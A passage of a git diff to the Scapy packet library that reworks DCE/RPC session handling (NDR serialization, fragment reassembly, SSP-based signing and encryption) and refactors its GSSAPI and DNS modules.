pointers + # - it uses NDRPacketField which handles deported conformant fields + class _cls(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRPacketField("pkt", None, cls)), + ] + + hdr = NDRSerialization1Header(b[:8]) / NDRSerialization1PrivateHeader(b[8:16]) + endian = {0x00: "big", 0x10: "little"}[hdr.Endianness] + padlen = (-hdr.ObjectBufferLength) % _TYPE1_S_PAD + # padlen should be 0 (pad included in length), but some implementations + # implement apparently misread the spec return ( - NDRSerialization1Header(b[:8]) / - NDRSerialization1PrivateHeader(b[8:16]) / - NDRPointer( + hdr + / _cls( + b[16 : 20 + hdr.ObjectBufferLength], ndr64=ndr64, - referent_id=struct.unpack(" It MUST include the padding length and exclude the header itself + pkt = NDRSerialization1Header( + Endianness=endian + ) / NDRSerialization1PrivateHeader( + ObjectBufferLength=pkt_len + (-pkt_len) % _TYPE1_S_PAD + ) + else: + cls = pkt.value.__class__ + val = pkt.payload.payload + pkt.payload.remove_payload() + + # See above about why we need an intermediary class + class _cls(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRPacketField("pkt", None, cls)), + ] + + ret = bytes(pkt / _cls(pkt=val)) + return ret + (-len(ret) % _TYPE1_S_PAD) * b"\x00" + + +class _NDRSerializeType1: + def __init__(self, *args, **kwargs): + super(_NDRSerializeType1, self).__init__(*args, **kwargs) + + def i2m(self, pkt, val): + return ndr_serialize1(val) + + def m2i(self, pkt, s): + return ndr_deserialize1(s, self.cls, ndr64=False) + + def i2len(self, pkt, val): + return len(self.i2m(pkt, val)) + + +class NDRSerializeType1PacketField(_NDRSerializeType1, PacketField): + __slots__ = ["ptr"] + + +class NDRSerializeType1PacketLenField(_NDRSerializeType1, PacketLenField): + __slots__ = ["ptr"] + + +class NDRSerializeType1PacketListField(_NDRSerializeType1, PacketListField): + __slots__ = ["ptr"] # --- DCE/RPC session @@ -1842,44 +2494,46 @@ class DceRpcSession(DefaultSession): def __init__(self, *args, **kwargs): self.rpc_bind_interface = None self.ndr64 = False + self.ndrendian = "little" + self.header_sign = False + self.ssp = kwargs.pop("ssp", None) + self.sspcontext = kwargs.pop("sspcontext", None) self.map_callid_opnum = {} + self.frags = collections.defaultdict(lambda: b"") super(DceRpcSession, self).__init__(*args, **kwargs) - def _parse_with_opnum(self, pkt, opnum, opts): - # use opnum to parse the payload - is_response = DceRpc5Response in pkt - try: - cls = self.rpc_bind_interface.opnums[opnum][is_response] - except KeyError: - log_runtime.warning( - "Unknown opnum %s for interface %s" - % (opnum, self.rpc_bind_interface) - ) - return - # Dissect payload using class - payload = cls(bytes(pkt[conf.raw_layer]), ndr64=self.ndr64, **opts) - pkt[conf.raw_layer].underlayer.remove_payload() - return pkt / payload - - def _process_dcerpc_packet(self, pkt): + def _up_pkt(self, pkt): + """ + Common function to handle the DCE/RPC session: what interfaces are bind, + opnums, etc. + """ opnum = None opts = {} - if DceRpc5Bind in pkt: + if DceRpc5Bind in pkt or DceRpc5AlterContext in pkt: # bind => get which RPC interface for ctx in pkt.context_elem: if_uuid = ctx.abstract_syntax.if_uuid + if_version = ctx.abstract_syntax.if_version try: - self.rpc_bind_interface = DCE_RPC_INTERFACES[if_uuid] + self.rpc_bind_interface = DCE_RPC_INTERFACES[(if_uuid, if_version)] except KeyError: + self.rpc_bind_interface = None log_runtime.warning( "Unknown RPC interface %s. Try loading the IDL" % if_uuid ) - elif DceRpc5BindAck in pkt: + # If the SSP supports "Header Signing", advertise it + if self.ssp is not None and self.ssp.dcerpc_header_signing: + pkt.pfc_flags |= 0x4 # PFC_SUPPORT_HEADER_SIGN + elif DceRpc5BindAck in pkt or DceRpc5AlterContextResp in pkt: # bind ack => is it NDR64 - for res in pkt[DceRpc5BindAck].results: + for res in pkt.results: if res.result == 0: # Accepted + self.ndrendian = {0: "big", 1: "little"}[pkt[DceRpc5].endian] if res.transfer_syntax.sprintf("%if_uuid%") == "NDR64": self.ndr64 = True + # Detect if "Header Signing" is in use + if pkt.pfc_flags.PFC_SUPPORT_HEADER_SIGN: + self.header_sign = True elif DceRpc5Request in pkt: # request => match opnum with callID opnum = pkt.opnum @@ -1891,20 +2545,315 @@ def _process_dcerpc_packet(self, pkt): del self.map_callid_opnum[pkt.call_id] except KeyError: log_runtime.info("Unknown call_id %s in DCE/RPC session" % pkt.call_id) - # Check for encrypted payloads - if pkt.auth_verifier and pkt.auth_verifier.is_encrypted(): + return opnum, opts + + # [C706] sect 12.6.2 - Fragmentation and Reassembly + # Since the connection-oriented transport guarantees sequentiality, the receiver + # will always receive the fragments in order. + + def _defragment(self, pkt): + """ + Function to defragment DCE/RPC packets. + """ + uid = pkt.call_id + if pkt.pfc_flags.PFC_FIRST_FRAG and pkt.pfc_flags.PFC_LAST_FRAG: + # Not fragmented + return pkt + if pkt.pfc_flags.PFC_FIRST_FRAG or uid in self.frags: + # Packet is fragmented + self.frags[uid] += pkt[DceRpc5].payload.payload.original + if pkt.pfc_flags.PFC_LAST_FRAG: + pkt[DceRpc5].payload.remove_payload() + pkt[DceRpc5].payload /= self.frags[uid] + return pkt + else: + # Not fragmented return pkt + + def _fragment(self, pkt): + """ + Function to fragment DCE/RPC packets. + """ + # unimplemented + pass + + # [MS-RPCE] sect 3.3.1.5.2.2 + + # The PDU header, PDU body, and sec_trailer MUST be passed in the input message, in + # this order, to GSS_WrapEx, GSS_UnwrapEx, GSS_GetMICEx, and GSS_VerifyMICEx. For + # integrity protection the sign flag for that PDU segment MUST be set to TRUE, else + # it MUST be set to FALSE. For confidentiality protection, the conf_req_flag for + # that PDU segment MUST be set to TRUE, else it MUST be set to FALSE. + + # If the authentication level is RPC_C_AUTHN_LEVEL_PKT_PRIVACY, the PDU body will + # be encrypted. + # The PDU body from the output message of GSS_UnwrapEx represents the plain text + # version of the PDU body. The PDU header and sec_trailer output from the output + # message SHOULD be ignored. + # Similarly the signature output SHOULD be ignored. + + def in_pkt(self, pkt): + # Defragment + pkt = self._defragment(pkt) + if not pkt: + return + # Get opnum and options + opnum, opts = self._up_pkt(pkt) + # Check for encrypted payloads + body = None + if conf.raw_layer in pkt: + body = bytes(pkt[conf.raw_layer]) + if pkt.auth_verifier and pkt.auth_verifier.is_protected() and body: + if self.sspcontext is None: + return pkt + if self.ssp.auth_level in ( + RPC_C_AUTHN_LEVEL.PKT_INTEGRITY, + RPC_C_AUTHN_LEVEL.PKT_PRIVACY, + ): + # note: 'vt_trailer' is included in the pdu body + # [MS-RPCE] sect 2.2.2.13 + # "The data structures MUST only appear in a request PDU, and they + # SHOULD be placed in the PDU immediately after the stub data but + # before the authentication padding octets. Therefore, for security + # purposes, the verification trailer is considered part of the PDU + # body." + if pkt.vt_trailer: + body += bytes(pkt.vt_trailer) + # Account for padding when computing checksum/encryption + if pkt.auth_padding: + body += pkt.auth_padding + + # Build pdu_header and sec_trailer + pdu_header = pkt.copy() + sec_trailer = pdu_header.auth_verifier + # sec_trailer: include the sec_trailer but not the Authentication token + authval_len = len(sec_trailer.auth_value) + # Discard everything out of the header + pdu_header.auth_padding = None + pdu_header.auth_verifier = None + pdu_header.payload.payload = NoPayload() + pdu_header.vt_trailer = None + + # [MS-RPCE] sect 2.2.2.12 + if self.ssp.auth_level == RPC_C_AUTHN_LEVEL.PKT_PRIVACY: + _msgs = self.ssp.GSS_UnwrapEx( + self.sspcontext, + [ + # "PDU header" + SSP.WRAP_MSG( + conf_req_flag=False, + sign=self.header_sign, + data=bytes(pdu_header), + ), + # "PDU body" + SSP.WRAP_MSG( + conf_req_flag=True, + sign=True, + data=body, + ), + # "sec_trailer" + SSP.WRAP_MSG( + conf_req_flag=False, + sign=self.header_sign, + data=bytes(sec_trailer)[:-authval_len], + ), + ], + pkt.auth_verifier.auth_value, + ) + body = _msgs[1].data # PDU body + elif self.ssp.auth_level == RPC_C_AUTHN_LEVEL.PKT_INTEGRITY: + self.ssp.GSS_VerifyMICEx( + self.sspcontext, + [ + # "PDU header" + SSP.MIC_MSG( + sign=self.header_sign, + data=bytes(pdu_header), + ), + # "PDU body" + SSP.MIC_MSG( + sign=True, + data=body, + ), + # "sec_trailer" + SSP.MIC_MSG( + sign=self.header_sign, + data=bytes(sec_trailer)[:-authval_len], + ), + ], + pkt.auth_verifier.auth_value, + ) + # Put padding back into the header + if pkt.auth_padding: + padlen = len(pkt.auth_padding) + body, pkt.auth_padding = body[:-padlen], body[-padlen:] + # Put back vt_trailer into the header + if pkt.vt_trailer: + vtlen = len(pkt.vt_trailer) + body, pkt.vt_trailer = body[:-vtlen], body[-vtlen:] # Try to parse the payload - if opnum is not None and self.rpc_bind_interface and conf.raw_layer in pkt: + if opnum is not None and self.rpc_bind_interface: # use opnum to parse the payload - pkt = self._parse_with_opnum(pkt, opnum, opts) + is_response = DceRpc5Response in pkt + try: + cls = self.rpc_bind_interface.opnums[opnum][is_response] + except KeyError: + log_runtime.warning( + "Unknown opnum %s for interface %s" + % (opnum, self.rpc_bind_interface) + ) + return pkt + if body: + # Dissect payload using class + payload = cls(body, ndr64=self.ndr64, ndrendian=self.ndrendian, **opts) + pkt[conf.raw_layer].underlayer.remove_payload() + pkt /= payload + elif not cls.fields_desc: + # Request class has no payload + pkt /= cls(ndr64=self.ndr64, ndrendian=self.ndrendian, **opts) return pkt + def out_pkt(self, pkt): + assert DceRpc5 in pkt + self._up_pkt(pkt) + if pkt.auth_verifier is not None: + # Verifier already set + return [pkt] + if self.sspcontext and isinstance( + pkt.payload, (DceRpc5Request, DceRpc5Response) + ): + body = bytes(pkt.payload.payload) + signature = None + if self.ssp.auth_level in ( + RPC_C_AUTHN_LEVEL.PKT_INTEGRITY, + RPC_C_AUTHN_LEVEL.PKT_PRIVACY, + ): + # Account for padding when computing checksum/encryption + if pkt.auth_padding is None: + padlen = (-len(body)) % _COMMON_AUTH_PAD # authdata padding + pkt.auth_padding = b"\x00" * padlen + else: + padlen = len(pkt.auth_padding) + # Remember that vt_trailer is included in the PDU + if pkt.vt_trailer: + body += bytes(pkt.vt_trailer) + # Remember that padding IS SIGNED & ENCRYPTED + body += pkt.auth_padding + # Add the auth_verifier + pkt.auth_verifier = CommonAuthVerifier( + auth_type=self.ssp.auth_type, + auth_level=self.ssp.auth_level, + auth_pad_length=padlen, + auth_value=NTLMSSP_MESSAGE_SIGNATURE(), + ) + # Build pdu_header and sec_trailer + pdu_header = pkt.copy() + pdu_header.auth_len = len(pdu_header.auth_verifier) - 8 + pdu_header.frag_len = len(pdu_header) + sec_trailer = pdu_header.auth_verifier + # sec_trailer: include the sec_trailer but not the Authentication token + authval_len = len(sec_trailer.auth_value) + # sec_trailer.auth_value = None + # Discard everything out of the header + pdu_header.auth_padding = None + pdu_header.auth_verifier = None + pdu_header.payload.payload = NoPayload() + pdu_header.vt_trailer = None + signature = None + # [MS-RPCE] sect 2.2.2.12 + if self.ssp.auth_level == RPC_C_AUTHN_LEVEL.PKT_PRIVACY: + _msgs, signature = self.ssp.GSS_WrapEx( + self.sspcontext, + [ + # "PDU header" + SSP.WRAP_MSG( + conf_req_flag=False, + sign=self.header_sign, + data=bytes(pdu_header), + ), + # "PDU body" + SSP.WRAP_MSG( + conf_req_flag=True, + sign=True, + data=body, + ), + # "sec_trailer" + SSP.WRAP_MSG( + conf_req_flag=False, + sign=self.header_sign, + data=bytes(sec_trailer)[:-authval_len], + ), + ], + ) + s = _msgs[1].data # PDU body + elif self.ssp.auth_level == RPC_C_AUTHN_LEVEL.PKT_INTEGRITY: + signature = self.ssp.GSS_GetMICEx( + self.sspcontext, + [ + # "PDU header" + SSP.MIC_MSG( + sign=self.header_sign, + data=bytes(pdu_header), + ), + # "PDU body" + SSP.MIC_MSG( + sign=True, + data=body, + ), + # "sec_trailer" + SSP.MIC_MSG( + sign=self.header_sign, + data=bytes(sec_trailer)[:-authval_len], + ), + ], + pkt.auth_verifier.auth_value, + ) + s = body + else: + raise ValueError("Impossible") + # Put padding back in the header + if padlen: + s, pkt.auth_padding = s[:-padlen], s[-padlen:] + # Put back vt_trailer into the header + if pkt.vt_trailer: + vtlen = len(pkt.vt_trailer) + s, pkt.vt_trailer = s[:-vtlen], s[-vtlen:] + else: + s = body + + # now inject the encrypted payload into the packet + pkt.payload.payload = conf.raw_layer(load=s) + # and the auth_value + if signature: + pkt.auth_verifier.auth_value = signature + else: + pkt.auth_verifier = None + return [pkt] + def process(self, pkt: Packet) -> Optional[Packet]: - if DceRpc5 in pkt: - return self._process_dcerpc_packet(pkt) - else: - return pkt + pkt = super(DceRpcSession, self).process(pkt) + if pkt is not None and DceRpc5 in pkt: + return self.in_pkt(pkt) + return pkt + + +class DceRpcSocket(StreamSocket): + """ + A Wrapper around StreamSocket that uses a DceRpcSession + """ + + def __init__(self, *args, **kwargs): + self.session = DceRpcSession(ssp=kwargs.pop("ssp", None)) + super(DceRpcSocket, self).__init__(*args, **kwargs) + + def send(self, x, **kwargs): + for pkt in self.session.out_pkt(x): + return super(DceRpcSocket, self).send(pkt, **kwargs) + + def recv(self, x=None): + pkt = super(DceRpcSocket, self).recv(x) + if pkt is not None: + return self.session.in_pkt(pkt) # --- TODO cleanup below diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 4022655648e..8b37ac725ad 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -418,7 +418,7 @@ class _OptReqListField(StrLenField): islist = 1 def i2h(self, pkt, x): - if x is None: + if not x: return [] return x diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 437dec1c57d..3e27ea32b73 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -362,6 +362,11 @@ class DNSTextField(StrLenField): islist = 1 + def i2h(self, pkt, x): + if not x: + return [] + return x + def m2i(self, pkt, s): ret_s = list() tmp_s = s @@ -1209,6 +1214,8 @@ def mysummary(self): type = "Ans" if self.an and isinstance(self.an[0], DNSRR): name = ' %s' % self.an[0].rdata + elif self.rcode != 0: + name = self.sprintf(' %rcode%') else: type = "Qry" if self.qd and isinstance(self.qd[0], DNSQR): @@ -1283,9 +1290,9 @@ def dns_resolve(qname, qtype="A", raw=False, verbose=1, timeout=3, **kwargs): [qname, struct.pack("!B", qtype)] + ([b"raw"] if raw else []) ) - answer = _dns_cache.get(cache_ident) - if answer: - return answer + result = _dns_cache.get(cache_ident) + if result: + return result kwargs.setdefault("timeout", timeout) kwargs.setdefault("verbose", 0) @@ -1326,21 +1333,18 @@ def dns_resolve(qname, qtype="A", raw=False, verbose=1, timeout=3, **kwargs): if res is not None: if raw: # Raw - answer = res + result = res else: - try: - # Find answer - answer = next( - x - for x in itertools.chain(res.an, res.ns, res.ar) - if x.type == qtype - ) - except StopIteration: - # No answer - return None - # Cache it - _dns_cache[cache_ident] = answer - return answer + # Find answers + result = [ + x + for x in itertools.chain(res.an, res.ns, res.ar) + if x.type == qtype + ] + if result: + # Cache it + _dns_cache[cache_ident] = result + return result else: raise TimeoutError @@ -1539,8 +1543,8 @@ def make_reply(self, req): # Relay mode ? try: _rslv = dns_resolve(rq.qname, qtype=rq.qtype) - if _rslv is not None: - ans.append(_rslv) + if _rslv: + ans.extend(_rslv) continue # next except TimeoutError: pass diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index ae598c6c0af..fcfc3d53459 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -7,66 +7,43 @@ Generic Security Services (GSS) API Implements parts of -- GSSAPI: RFC2743 -- GSSAPI SPNEGO: RFC4178 > RFC2478 -- GSSAPI SPNEGO NEGOEX: [MS-NEGOEX] +- GSSAPI: RFC4121 / RFC2743 +- GSSAPI C bindings: RFC2744 """ -import struct -from uuid import UUID +import abc -from scapy.asn1.asn1 import ASN1_SEQUENCE, ASN1_Class_UNIVERSAL, ASN1_Codecs +from dataclasses import dataclass +from enum import IntEnum + +from scapy.asn1.asn1 import ( + ASN1_SEQUENCE, + ASN1_Class_UNIVERSAL, + ASN1_Codecs, +) from scapy.asn1.ber import BERcodec_SEQUENCE from scapy.asn1.mib import conf # loads conf.mib from scapy.asn1fields import ( - ASN1F_CHOICE, - ASN1F_ENUMERATED, - ASN1F_FLAGS, ASN1F_OID, ASN1F_PACKET, ASN1F_SEQUENCE, - ASN1F_SEQUENCE_OF, - ASN1F_STRING, - ASN1F_optional ) from scapy.asn1packet import ASN1_Packet from scapy.fields import ( - FieldListField, + FieldLenField, LEIntEnumField, - LEIntField, - LELongEnumField, - LELongField, - LEShortField, - MultipleTypeField, PacketField, - PacketListField, - StrFixedLenField, - UUIDEnumField, - UUIDField, - StrField, - XStrFixedLenField, - XStrLenField + StrLenField, ) -from scapy.packet import Packet, bind_layers +from scapy.packet import Packet -# Providers -from scapy.layers.kerberos import ( - Kerberos, - KRB5_GSS, -) -from scapy.layers.ntlm import ( - NEGOEX_EXCHANGE_NTLM, - NTLM_Header, - _NTLMPayloadField, -) - -# Typing imports +# Type hints from typing import ( - Dict, + Any, + List, Tuple, ) - # https://datatracker.ietf.org/doc/html/rfc1508#page-48 @@ -83,371 +60,377 @@ class BERcodec_GSSAPI_APPLICATION(BERcodec_SEQUENCE): tag = ASN1_Class_GSSAPI.APPLICATION -class ASN1F_SNMP_GSSAPI_APPLICATION(ASN1F_SEQUENCE): +class ASN1F_GSSAPI_APPLICATION(ASN1F_SEQUENCE): ASN1_tag = ASN1_Class_GSSAPI.APPLICATION -# SPNEGO negTokenInit -# https://datatracker.ietf.org/doc/html/rfc4178#section-4.2.1 - - -class SPNEGO_MechType(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_OID("oid", None) - - -class SPNEGO_MechTypes(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE_OF("mechTypes", None, SPNEGO_MechType) - - -class SPNEGO_MechListMIC(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE(ASN1F_STRING("value", "")) - - -_mechDissector = { - "1.3.6.1.4.1.311.2.2.10": NTLM_Header, # NTLM - "1.2.840.48018.1.2.2": Kerberos, # MS KRB5 - Microsoft Kerberos 5 - "1.2.840.113554.1.2.2": Kerberos, # Kerberos 5 -} +# GSS API Blob +# https://datatracker.ietf.org/doc/html/rfc4121 -class _SPNEGO_Token_Field(ASN1F_STRING): - def i2m(self, pkt, x): - if x is None: - x = b"" - return super(_SPNEGO_Token_Field, self).i2m(pkt, bytes(x)) +# Filled by providers +_GSSAPI_OIDS = {} +_GSSAPI_SIGNATURE_OIDS = {} - def m2i(self, pkt, s): - dat, r = super(_SPNEGO_Token_Field, self).m2i(pkt, s) - if isinstance(pkt.underlayer, SPNEGO_negTokenInit): - types = pkt.underlayer.mechTypes - elif isinstance(pkt.underlayer, SPNEGO_negTokenResp): - types = [pkt.underlayer.supportedMech] - if types and types[0] and types[0].oid.val in _mechDissector: - return _mechDissector[types[0].oid.val](dat.val), r - return dat, r +# section 4.1 -class SPNEGO_Token(ASN1_Packet): +class GSSAPI_BLOB(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = _SPNEGO_Token_Field("value", None) + ASN1_root = ASN1F_GSSAPI_APPLICATION( + ASN1F_OID("MechType", "1.3.6.1.5.5.2"), + ASN1F_PACKET( + "innerToken", + None, + None, + next_cls_cb=lambda pkt: _GSSAPI_OIDS.get(pkt.MechType.val, conf.raw_layer), + ), + ) + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 1: + if ord(_pkt[:1]) & 0xA0 >= 0xA0: + from scapy.layers.spnego import SPNEGO_negToken -_ContextFlags = ["delegFlag", - "mutualFlag", - "replayFlag", - "sequenceFlag", - "superseded", - "anonFlag", - "confFlag", - "integFlag"] + # XXX: sometimes the token is raw, we should look from + # the session what to use here. For now: hardcode SPNEGO + # (THIS IS A VERY STRONG ASSUMPTION) + return SPNEGO_negToken + if _pkt[:7] == b"NTLMSSP": + from scapy.layers.ntlm import NTLM_Header + # XXX: if no mechTypes are provided during SPNEGO exchange, + # Windows falls back to a plain NTLM_Header. + return NTLM_Header.dispatch_hook(_pkt=_pkt, *args, **kargs) + return cls -class SPNEGO_negTokenInit(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - ASN1F_SEQUENCE( - ASN1F_optional( - ASN1F_SEQUENCE_OF("mechTypes", None, SPNEGO_MechType, - explicit_tag=0xa0) - ), - ASN1F_optional( - ASN1F_FLAGS("reqFlags", None, _ContextFlags, - implicit_tag=0x81)), - ASN1F_optional( - ASN1F_PACKET("mechToken", None, SPNEGO_Token, - explicit_tag=0xa2) - ), - ASN1F_optional( - ASN1F_PACKET("mechListMIC", None, - SPNEGO_MechListMIC, - implicit_tag=0xa3) - ) - ) - ) +# Same but to store the signatures (e.g. DCE/RPC) -# SPNEGO negTokenTarg -# https://datatracker.ietf.org/doc/html/rfc4178#section-4.2.2 -class SPNEGO_negTokenResp(ASN1_Packet): +class GSSAPI_BLOB_SIGNATURE(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - ASN1F_SEQUENCE( - ASN1F_optional( - ASN1F_ENUMERATED("negResult", 0, - {0: "accept-completed", - 1: "accept-incomplete", - 2: "reject", - 3: "request-mic"}, - explicit_tag=0xa0), - ), - ASN1F_optional( - ASN1F_PACKET("supportedMech", SPNEGO_MechType(), - SPNEGO_MechType, - explicit_tag=0xa1), - ), - ASN1F_optional( - ASN1F_PACKET("responseToken", None, - SPNEGO_Token, - explicit_tag=0xa2) - ), - ASN1F_optional( - ASN1F_PACKET("mechListMIC", None, - SPNEGO_MechListMIC, - implicit_tag=0xa3) - ) - ) + ASN1_root = ASN1F_GSSAPI_APPLICATION( + ASN1F_OID("MechType", "1.3.6.1.5.5.2"), + ASN1F_PACKET( + "innerToken", + None, + None, + next_cls_cb=lambda pkt: _GSSAPI_SIGNATURE_OIDS.get( + pkt.MechType.val, conf.raw_layer + ), # noqa: E501 + ), ) -class SPNEGO_negToken(ASN1_Packet): - ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_CHOICE("token", SPNEGO_negTokenInit(), - ASN1F_PACKET("negTokenInit", - SPNEGO_negTokenInit(), - SPNEGO_negTokenInit, - implicit_tag=0xa0), - ASN1F_PACKET("negTokenResp", - SPNEGO_negTokenResp(), - SPNEGO_negTokenResp, - implicit_tag=0xa1) - ) - -# NEGOEX -# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-negoex/0ad7a003-ab56-4839-a204-b555ca6759a2 - - -_NEGOEX_AUTH_SCHEMES = { - # Reversed. Is there any doc related to this? - # The NEGOEX doc is very ellusive - UUID("5c33530d-eaf9-0d4d-b2ec-4ae3786ec308"): "UUID('[NTLM-UUID]')", +# RFC2744 sect 3.9 - Status Values + +GSS_S_COMPLETE = 0 + +# These errors are encoded into the 32-bit GSS status code as follows: +# MSB LSB +# |------------------------------------------------------------| +# | Calling Error | Routine Error | Supplementary Info | +# |------------------------------------------------------------| +# Bit 31 24 23 16 15 0 + +GSS_C_CALLING_ERROR_OFFSET = 24 +GSS_C_ROUTINE_ERROR_OFFSET = 16 +GSS_C_SUPPLEMENTARY_OFFSET = 0 + +# Calling errors: + +GSS_S_CALL_INACCESSIBLE_READ = 1 << GSS_C_CALLING_ERROR_OFFSET +GSS_S_CALL_INACCESSIBLE_WRITE = 2 << GSS_C_CALLING_ERROR_OFFSET +GSS_S_CALL_BAD_STRUCTURE = 3 << GSS_C_CALLING_ERROR_OFFSET + +# Routine errors: + +GSS_S_BAD_MECH = 1 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_BAD_NAME = 2 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_BAD_NAMETYPE = 3 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_BAD_BINDINGS = 4 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_BAD_STATUS = 5 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_BAD_SIG = 6 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_BAD_MIC = GSS_S_BAD_SIG +GSS_S_NO_CRED = 7 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_NO_CONTEXT = 8 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_DEFECTIVE_TOKEN = 9 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_DEFECTIVE_CREDENTIAL = 10 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_CREDENTIALS_EXPIRED = 11 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_CONTEXT_EXPIRED = 12 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_FAILURE = 13 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_BAD_QOP = 14 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_UNAUTHORIZED = 15 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_UNAVAILABLE = 16 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_DUPLICATE_ELEMENT = 17 << GSS_C_ROUTINE_ERROR_OFFSET +GSS_S_NAME_NOT_MN = 18 << GSS_C_ROUTINE_ERROR_OFFSET + +# Supplementary info bits: + +GSS_S_CONTINUE_NEEDED = 1 << (GSS_C_SUPPLEMENTARY_OFFSET + 0) +GSS_S_DUPLICATE_TOKEN = 1 << (GSS_C_SUPPLEMENTARY_OFFSET + 1) +GSS_S_OLD_TOKEN = 1 << (GSS_C_SUPPLEMENTARY_OFFSET + 2) +GSS_S_UNSEQ_TOKEN = 1 << (GSS_C_SUPPLEMENTARY_OFFSET + 3) +GSS_S_GAP_TOKEN = 1 << (GSS_C_SUPPLEMENTARY_OFFSET + 4) + +# Address families (RFC2744 sect 3.11) + +_GSS_ADDRTYPE = { + 0: "GSS_C_AF_UNSPEC", + 1: "GSS_C_AF_LOCAL", + 2: "GSS_C_AF_INET", + 3: "GSS_C_AF_IMPLINK", + 4: "GSS_C_AF_PUP", + 5: "GSS_C_AF_CHAOS", + 6: "GSS_C_AF_NS", + 7: "GSS_C_AF_NBS", + 8: "GSS_C_AF_ECMA", + 9: "GSS_C_AF_DATAKIT", + 10: "GSS_C_AF_CCITT", + 11: "GSS_C_AF_SNA", + 12: "GSS_C_AF_DECnet", + 13: "GSS_C_AF_DLI", + 14: "GSS_C_AF_LAT", + 15: "GSS_C_AF_HYLINK", + 16: "GSS_C_AF_APPLETALK", + 17: "GSS_C_AF_BSC", + 18: "GSS_C_AF_DSS", + 19: "GSS_C_AF_OSI", + 21: "GSS_C_AF_X25", + 255: "GSS_C_AF_NULLADDR", } -class NEGOEX_MESSAGE_HEADER(Packet): - fields_desc = [ - StrFixedLenField("Signature", "NEGOEXTS", length=8), - LEIntEnumField("MessageType", 0, {0x0: "INITIATOR_NEGO", - 0x01: "ACCEPTOR_NEGO", - 0x02: "INITIATOR_META_DATA", - 0x03: "ACCEPTOR_META_DATA", - 0x04: "CHALLENGE", - 0x05: "AP_REQUEST", - 0x06: "VERIFY", - 0x07: "ALERT"}), - LEIntField("SequenceNum", 0), - LEIntField("cbHeaderLength", None), - LEIntField("cbMessageLength", None), - UUIDField("ConversationId", None), - ] +# GSS Structures - def post_build(self, pkt, pay): - if self.cbHeaderLength is None: - pkt = pkt[16:] + struct.pack(" bytes - """Util function to build the offset and populate the lengths""" - for field_name, value in self.fields["Payload"]: - length = self.get_field( - "Payload").fields_map[field_name].i2len(self, value) - count = self.get_field( - "Payload").fields_map[field_name].i2count(self, value) - offset = fields[field_name] - # Offset - if self.getfieldval(field_name + "BufferOffset") is None: - p = p[:offset] + \ - struct.pack(" bytes - return _NEGOEX_post_build(self, pkt, self.OFFSET, { - "AuthScheme": 96, - "Extension": 102, - }) + pay - - @classmethod - def dispatch_hook(cls, _pkt=None, *args, **kargs): - if _pkt and len(_pkt) >= 12: - MessageType = struct.unpack("" % self.__class__.__name__ + + class CONTEXT: + """ + A Security context i.e. the 'state' of the secure negotiation + """ -def _checksum_size(pkt): - if pkt.ChecksumType == 1: - return 4 - elif pkt.ChecksumType in [2, 4, 6, 7]: - return 16 - elif pkt.ChecksumType in [3, 8, 9]: - return 24 - elif pkt.ChecksumType == 5: - return 8 - elif pkt.ChecksumType in [10, 12, 13, 14, 15, 16]: - return 20 - return 0 - - -class NEGOEX_CHECKSUM(Packet): - fields_desc = [ - LELongField("cbHeaderLength", 20), - LELongEnumField("ChecksumScheme", 1, {1: "CHECKSUM_SCHEME_RFC3961"}), - LELongEnumField("ChecksumType", None, _checksum_types), - XStrLenField("ChecksumValue", b"", length_from=_checksum_size) - ] - - -class NEGOEX_EXCHANGE_MESSAGE(Packet): - OFFSET = 64 - show_indent = 0 - fields_desc = [ - NEGOEX_MESSAGE_HEADER, - UUIDEnumField("AuthScheme", None, _NEGOEX_AUTH_SCHEMES), - LEIntField("ExchangeBufferOffset", 0), - LEIntField("ExchangeLen", 0), - _NTLMPayloadField( - 'Payload', OFFSET, [ - # The NEGOEX doc mentions the following blob as as an - # "opaque handshake for the client authentication scheme". - # NEGOEX_EXCHANGE_NTLM is a reversed interpretation, and is - # probably not accurate. - MultipleTypeField( - [ - (PacketField("Exchange", None, NEGOEX_EXCHANGE_NTLM), - lambda pkt: pkt.AuthScheme == \ - UUID("5c33530d-eaf9-0d4d-b2ec-4ae3786ec308")), - ], - StrField("Exchange", b"") + __slots__ = ["state"] + + def __init__(self): + raise NotImplementedError + + def __repr__(self): + return "[Default SSP]" + + class STATE(IntEnum): + """ + An Enum that contains the states of an SSP + """ + + @abc.abstractmethod + def GSS_Init_sec_context(self, Context: CONTEXT, val=None): + """ + GSS_Init_sec_context: client-side call for the SSP + """ + raise 